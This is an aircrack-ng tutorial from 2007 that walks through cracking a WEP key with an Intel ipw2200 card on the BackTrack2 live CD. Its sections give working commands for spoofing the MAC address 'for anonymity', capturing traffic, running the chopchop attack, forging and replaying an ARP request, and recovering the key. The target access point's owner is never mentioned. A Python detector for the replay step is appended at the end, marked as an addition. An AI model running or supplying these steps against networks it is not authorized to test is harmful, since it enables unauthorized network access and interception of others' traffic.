====== Tutorial: How to crack WEP using an ipw2200 based card ======

Version: 0.1 August 27, 2007 \\
By: drio \\

=== TODO: ===

  * How to compile the device driver from scratch to support injection
  * screen usage example
  * Different attacks
  * More detailed explanation of what we are doing in each step
  * Upgrade the airodump-ng tools from the livecd

===== Introduction =====

This document is based on this [[http://forum.aircrack-ng.org/index.php?topic=2077.0|post]] you can find in the [[http://forum.aircrack-ng.org/index.php|forums]].

When I started using the aircrack-ng tools I did not have the [[Compatibility_Drivers|best hardware]] for it. I only had an IBM Thinkpad T42 that comes with an Intel 2200BG card. Most of the WEP attacks require injecting some packets into the network in order to speed up the process of gathering IVs. In order to do that, the device driver that we use for controlling our card has to support injection. This [[newbie_guide|tutorial]] explains how to compile and install modules on your Linux box. Installing Linux on my box was not an option, so I decided to use the [[http://www.remote-exploit.org/backtrack.html|backtrack2]] livecd. Backtrack comes with the necessary drivers already compiled and ready to be used directly from the CD.

Here are the basic steps we will be going through:

  - Verify that our ipw2200 card is recognized by the OS (Linux).
  - List available networks.
  - Change the MAC address of our card.
  - Configure the wireless parameters using iwconfig.
  - Collect data with airodump-ng.
  - Launch the [[korek_chopchop|chopchop]] attack.
  - Create the ARP request packet.
  - Send the ARP request over and over.
  - Wait to gather enough IVs.
  - Crack the WEP key using aircrack-ng.

Keep in mind that we are going to be running different commands and we will need to switch between them. Most documents recommend starting [[http://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/X_Window_core_protocol|X Window]] and then opening various xterminals. There is another option: [[http://en.wikipedia.org/wiki/GNU_Screen|screen]].

===== Verify that our ipw2200 card is recognized by the OS (Linux) =====

Once the livecd has booted and you have logged in, you can run this to verify that you actually have an ipw2200-based card:

<code>
# lspci -vv
.....
02:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
        Subsystem: Intel Corporation Unknown device 2711
        Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B-
        Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- SERR-
.....
</code>

The ipw2200 driver can create a monitor interface, rtap0, for us. To do so:

<code>
# echo 1 > /sys/class/net/eth1/device/rtap_iface
</code>

That's the method I would recommend. But, if you are using the latest version of airodump-ng (we'll use it in the next section), you can tell the program to create the rtap0 device for you:

<code>
# airodump-ng -c X rtap0
</code>

We'll talk about it in the next section. Ok, so we have verified that we have an ipw2200 card and that Linux can talk to it.

===== List available networks =====

Now, we want to get a list of the wireless networks around us. To do that:

<code>
# iwlist eth1 scanning
</code>

Keep the output of this command in a window; we will use it later.

=== NOTE: ===

I am assuming that Linux mapped your wireless card to eth1. Most likely you have an ethernet card on eth0.

===== Change the MAC address of our card =====

This step is optional, but it will give us some anonymity. In a new window:

<code>
# ifconfig eth1 up hw ether 00:11:22:33:44:55
</code>

===== Configure the wireless parameters =====

Let's start by configuring the wireless ESSID and channel, and setting up a fake key:

<code>
# iwconfig eth1 essid <essid> channel <#> key s:fakekey mode managed
</code>

Due to some limitations with the firmware we have to force a fake key and set managed mode to ensure the aircrack-ng tools work properly. ESSID is the name of the wireless network of our target AP. Channel is the wireless channel.

===== Collect data with airodump-ng =====

In another window, we start collecting data:

<code>
# airodump-ng -c <channel> --bssid <bssid> -w dump rtap0
</code>

Notice how we use rtap0 as the input interface. Also, all the commands we are going to be running generate output files, so it is a good idea to create a new directory and run all of them from there. As we said before, if you are running the latest version of airodump-ng, rtap0 will be created for you automatically in case you didn't create it before.

===== Launch the chopchop attack =====

Now it is time to do some injection. In a new window we will launch the chopchop attack:

<code>
# aireplay-ng -4 -a <bssid> -h 00:11:22:33:44:55 -i rtap0 eth1
</code>

Note the modifier "-i rtap0". This tells aireplay to use rtap0 for listening and eth1 for injecting. Also, "-4" is the type of attack (chopchop). A prompt will ask you whether to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream (.xor) file. The keystream file will look something like "replay_dec-######.xor". Make sure there are no errors reported after using aireplay. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine. If the attack fails, try to rerun the command omitting the "-h" parameter.

===== Create the ARP request packet =====

Now we will create an ARP request packet using the acquired keystream file. The "-l" and "-k" options are the source IP and destination IP. If you use valid destination IPs then you will be running an [[arp_amplification|amplification attack]]. This can be run in the same window where we ran the chopchop attack:

<code>
# packetforge-ng -0 -a <bssid> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request
</code>

===== Send the ARP request over and over =====

Finally, we will send our newly created ARP request packet over and over. After this step you should see the "Data" count begin to rise quickly back in the window where we had airodump-ng running. If the data count doesn't change (usually it grows by between 80 and 350 per second) then something is wrong.

<code>
# aireplay-ng -2 -r arp-request eth1
</code>

===== Wait to gather enough IVs =====

We have to wait now so airodump-ng gathers enough data (enough IVs) so we can run aircrack-ng. How many packets do we need for aircrack-ng to crack the WEP key? It depends. The version of aircrack-ng that comes with backtrack2 is not the latest one, so we need around 1,000,000 IVs. If we are using the latest version (0.9 and up), 100,000 is enough.

===== Crack the WEP key using aircrack-ng =====

In another window we launch:

<code>
# aircrack-ng -z dump*.cap
</code>

Depending on the number of packets you have gathered, this may take some minutes or you may get the key immediately. The -z argument tells aircrack-ng to also try the PTW attack. If your version of aircrack-ng doesn't support it, just omit it.

=== NOTE: ===

aircrack-ng can run concurrently with airodump-ng. This is very useful because it will allow you to check the number of IVs that airodump-ng has gathered. You can cancel the execution of aircrack-ng and wait for more data to be gathered.
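The replay step above leaves a very distinctive trace on the air: aireplay-ng -2 retransmits one forged frame unchanged, so the same WEP IV and frame length arrive hundreds of times per second from a single station, while a legitimate station's IV changes with every frame. The following detection example is added here and is not part of the original tutorial or of the aircrack-ng project; it runs that check over constructed frame records, and the BSSID, timestamps and thresholds are assumptions chosen for the demo.

```python
from collections import Counter, defaultdict

# Constructed sample records (not real captures):
# (timestamp_s, transmitter MAC, BSSID, WEP IV as hex, frame length).
# A legitimate station: ~10 frames/s, a fresh IV on every frame, varying lengths.
LEGIT_STATION = [
    (i / 10.0, "00:aa:bb:cc:dd:01", "00:14:6c:7e:40:80", f"{0x100 + i:06x}", 120 + i % 7)
    for i in range(20)
]
# The replayed forged ARP request from the tutorial's spoofed MAC: one fixed IV,
# one fixed length, 200 frames/s. The BSSID is an invented placeholder.
REPLAYED_ARP = [
    (i / 200.0, "00:11:22:33:44:55", "00:14:6c:7e:40:80", "0a1b2c", 68)
    for i in range(300)
]
SAMPLE_FRAMES = LEGIT_STATION + REPLAYED_ARP


def replay_alerts(frames, window_s=1.0, min_rate=80, min_iv_share=0.9):
    """Flag (station, BSSID) pairs that, within one time window, send at least
    `min_rate` frames per second of which a share >= `min_iv_share` carry the
    same WEP IV. Normal WEP traffic changes the IV per frame; a replayed frame
    cannot, so the IV repeats exactly as often as the frame does."""
    buckets = defaultdict(list)
    for ts, src, bssid, iv, length in frames:
        buckets[(src, bssid, int(ts // window_s))].append((iv, length))

    alerts = []
    for (src, bssid, window), items in sorted(buckets.items()):
        rate = len(items) / window_s
        if rate < min_rate:
            continue  # no burst in this window; IV reuse alone is not flagged
        top_iv, top_count = Counter(iv for iv, _ in items).most_common(1)[0]
        if top_count / len(items) >= min_iv_share:
            alerts.append({
                "station": src,
                "bssid": bssid,
                "window": window,
                "frames_per_s": rate,
                "reused_iv": top_iv,
                "distinct_lengths": len({length for _, length in items}),
            })
    return alerts


if __name__ == "__main__":
    for alert in replay_alerts(SAMPLE_FRAMES):
        print(alert)
```

On the constructed sample the legitimate station never trips the check, while the replayed frame is flagged in both one-second windows it spans.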